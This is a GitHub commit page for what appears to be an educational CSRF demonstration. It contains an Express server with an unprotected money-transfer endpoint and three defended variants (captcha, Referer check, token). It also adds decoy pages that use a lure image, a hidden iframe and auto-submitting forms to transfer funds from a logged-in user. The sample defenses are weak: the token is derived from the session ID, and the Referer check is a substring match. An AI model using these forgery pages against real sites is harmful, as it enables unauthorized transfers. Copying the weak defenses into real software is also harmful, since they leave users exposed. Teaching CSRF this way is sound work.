Skip to content

Commit

Permalink
CSRF
Browse files Browse the repository at this point in the history
  • Loading branch information
@YvetteLau
YvetteLau committed May 11, 2019
1 parent 3f064f5 commit 31fe42e
Show file tree
Hide file tree
Showing 16 changed files with 1,077 additions and 10 deletions.
92 changes: 90 additions & 2 deletions Security/CSRF/server.js
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@ const app = express();
const path = require('path');
const bodyParser = require('body-parser');
const cookieParser = require('cookie-parser');

const svgCaptcha = require('svg-captcha');

//设置路径
app.use(express.static(path.join(__dirname, 'src')));
Expand Down Expand Up @@ -40,10 +40,14 @@ app.post('/api/login', (req, res) => {

app.get('/api/userinfo', (req, res) => {
let info = session[req.cookies[SESSION_ID]];
/**增加验证码 */
//data:svg, text:验证码文本
let {data, text} = svgCaptcha.create();
if (info) {
//用户已经登录
let username = info.user.username;
res.json({ code: 0, info: { username, account: info.user.account } });
info.code = text; //下次请求时,对比验证码
res.json({ code: 0, info: { username, account: info.user.account, svg: data } });
} else {
res.json({ code: 1, error: 'user not logged in.' });
}
Expand All @@ -69,4 +73,88 @@ app.post('/api/transfer', (req, res) => {
}
});

//转账前,先验证 验证码
app.post('/api/transfer1', (req, res) => {
let info = session[req.cookies[SESSION_ID]];
if (info) {
//用户已经登录
let {payee, amount, code} = req.body;
if(code && code.toUpperCase() === info.code.toUpperCase() && Number(amount)) {
//验证码正确
let username = info.user.username;
userList.forEach(user => {
if(user.username === username) {
user.account -= amount;
}
if(user.username === payee) {
user.account += amount;
}
})
res.json({ code: 0 });
}else{
res.json({ code: 1, error: 'code error.' });
}

} else {
res.json({ code: 1, error: 'user not logged in.' });
}
});

//转账前,判断请求来源(referer)
app.post('/api/transfer2', (req, res) => {
let info = session[req.cookies[SESSION_ID]];
if (info) {
//用户已经登录
let {payee, amount} = req.body;
let referer = req.headers['referer'] || '';
if(Number(amount) && referer.includes('localhost:3001')) {
//referer正确
let username = info.user.username;
userList.forEach(user => {
if(user.username === username) {
user.account -= amount;
}
if(user.username === payee) {
user.account += amount;
}
})
res.json({ code: 0 });
}else{
res.json({ code: 1, error: 'illegal source of request .' });
}

} else {
res.json({ code: 1, error: 'user not logged in.' });
}
});


//转账前,先验证 token
app.post('/api/transfer3', (req, res) => {
let info = session[req.cookies[SESSION_ID]];
if (info) {
//用户已经登录
let {payee, amount, token} = req.body;
console.log(token, 'mytoken_' + req.cookies[SESSION_ID])
if(token === 'mytoken_' + req.cookies[SESSION_ID] && Number(amount)) {
//token 正确
let username = info.user.username;
userList.forEach(user => {
if(user.username === username) {
user.account -= amount;
}
if(user.username === payee) {
user.account += amount;
}
})
res.json({ code: 0 });
}else{
res.json({ code: 1, error: 'illegal.' });
}

} else {
res.json({ code: 1, error: 'user not logged in.' });
}
});

app.listen(3001);
26 changes: 25 additions & 1 deletion Security/CSRF/src/fake.html
View file
Original file line number Diff line number Diff line change
@@ -1,12 +1,36 @@
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>你被骗了</title>
</head>

<body>

<!-- 偷偷转走你的钱: 3001端口的cookie被自动带去了3001的服务器 -->
<!-- 表单没有跨域问题 -->
<form name="sneak" action="http://localhost:3001/api/transfer" method="post">
<input type="text" name="payee" value="yvette" />
<input type="text" name="amount" value="2000" />
</form>

<!-- 有验证码的接口 -->
<!-- 虽然用户已经登录,但是需要验证码,验证码匹配错误,不能转走钱 -->
<form name="sneak1" action="http://localhost:3001/api/transfer1" method="post">
<input type="text" name="payee" value="yvette" />
<input type="text" name="amount" value="2000" />
</form>
</body>
<script>
window.onload = function () {
/**
* 以下语句,每次放开对应的一个即可
*/
document.sneak.submit(); //没有防御CSRF攻击
// document.sneak1.submit(); //有验证码的情况
}
</script>

</html>
25 changes: 25 additions & 0 deletions Security/CSRF/src/fake1.html
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>你被骗了</title>
</head>

<body>
<!-- 有验证码的接口 -->
<!-- 虽然用户已经登录,但是需要验证码,验证码匹配错误,不能转走钱 -->
<form name="sneak1" action="http://localhost:3001/api/transfer1" method="post">
<input type="text" name="payee" value="yvette" />
<input type="text" name="amount" value="2000" />
</form>
</body>
<script>
window.onload = function () {
document.sneak1.submit(); //有验证码的情况
}
</script>

</html>
25 changes: 25 additions & 0 deletions Security/CSRF/src/fake2.html
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>你被骗了</title>
</head>

<body>
<!-- 判断来源的接口 -->
<!-- 虽然用户已经登录,但是需要服务端会判断请求的来源,来源错误,不能转走钱 -->
<form name="sneak1" action="http://localhost:3001/api/transfer2" method="post">
<input type="text" name="payee" value="yvette" />
<input type="text" name="amount" value="2000" />
</form>
</body>
<script>
window.onload = function () {
document.sneak1.submit(); //有验证码的情况
}
</script>

</html>
25 changes: 25 additions & 0 deletions Security/CSRF/src/fake3.html
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>你被骗了</title>
</head>

<body>
<!-- 增加token -->
<!-- 虽然用户已经登录,但是需要服务端会判断token,没有 token 或者 token 不正确,不能转走钱 -->
<form name="sneak1" action="http://localhost:3001/api/transfer3" method="post">
<input type="text" name="payee" value="yvette" />
<input type="text" name="amount" value="2000" />
</form>
</body>
<script>
window.onload = function () {
document.sneak1.submit(); //有验证码的情况
}
</script>

</html>
9 changes: 7 additions & 2 deletions Security/CSRF/src/fish.html
View file
Original file line number Diff line number Diff line change
@@ -1,14 +1,19 @@
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>嘿嘿嘿</title>
</head>

<body>
<a style="display: block" href="/fake.html"><img width="600"src="http://b4-q.mafengwo.net/s12/M00/FE/AE/wKgED1v772uAa_VkAA3UNOJhbkE35.jpeg?imageMogr2%2Fthumbnail%2F1360x%2Fstrip%2Fquality%2F90"/>
<p>小姐姐教你如何脱单?</p></a>
<img width="600"
src="http://b4-q.mafengwo.net/s12/M00/FE/AE/wKgED1v772uAa_VkAA3UNOJhbkE35.jpeg?imageMogr2%2Fthumbnail%2F1360x%2Fstrip%2Fquality%2F90" />
<p>你的钱被偷走了~</p>
<a href="http://localhost:3001/">返回查看余额</a>
<iframe src="/fake.html" style="display: none"></iframe>
</body>

</html>
19 changes: 19 additions & 0 deletions Security/CSRF/src/fish1.html
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>嘿嘿嘿</title>
</head>

<body>
<img width="600"
src="http://b4-q.mafengwo.net/s12/M00/FE/AE/wKgED1v772uAa_VkAA3UNOJhbkE35.jpeg?imageMogr2%2Fthumbnail%2F1360x%2Fstrip%2Fquality%2F90" />
<p>你的钱还很安全~</p>
<a href="http://localhost:3001/safe1.html">返回查看余额</a>
<iframe src="/fake1.html" style="display: none"></iframe>
</body>

</html>
19 changes: 19 additions & 0 deletions Security/CSRF/src/fish2.html
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>嘿嘿嘿</title>
</head>

<body>
<img width="600"
src="http://b4-q.mafengwo.net/s12/M00/FE/AE/wKgED1v772uAa_VkAA3UNOJhbkE35.jpeg?imageMogr2%2Fthumbnail%2F1360x%2Fstrip%2Fquality%2F90" />
<p>你的钱还很安全~</p>
<a href="http://localhost:3001/safe2.html">返回查看余额</a>
<iframe src="/fake1.html" style="display: none"></iframe>
</body>

</html>
19 changes: 19 additions & 0 deletions Security/CSRF/src/fish3.html
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>嘿嘿嘿</title>
</head>

<body>
<img width="600"
src="http://b4-q.mafengwo.net/s12/M00/FE/AE/wKgED1v772uAa_VkAA3UNOJhbkE35.jpeg?imageMogr2%2Fthumbnail%2F1360x%2Fstrip%2Fquality%2F90" />
<p>你的钱还很安全~</p>
<a href="http://localhost:3001/safe3.html">返回查看余额</a>
<iframe src="/fake1.html" style="display: none"></iframe>
</body>

</html>
6 changes: 3 additions & 3 deletions Security/CSRF/src/index.html
View file
Original file line number Diff line number Diff line change
Expand Up @@ -33,7 +33,7 @@ <h5>
<input class="form-control" type="text" id="amount" />
</div>
<div class="form-group">
<input class="btn btn-primary" type="submit" id="transfer" value="登录" />
<input class="btn btn-primary" type="submit" id="transfer" value="转账" />
</div>
</form>
</div>
Expand Down Expand Up @@ -74,8 +74,8 @@ <h5>
//重新获取用户信息
getUserInfo();
} else {
//登录失败(如果是用户登录成功时,还能够获取到用户的cookie)
location.href = `/login.html`;
//失败
// location.href = `/login.html`;
}
});
});
Expand Down
Loading

0 comments on commit 31fe42e

Please sign in to comment.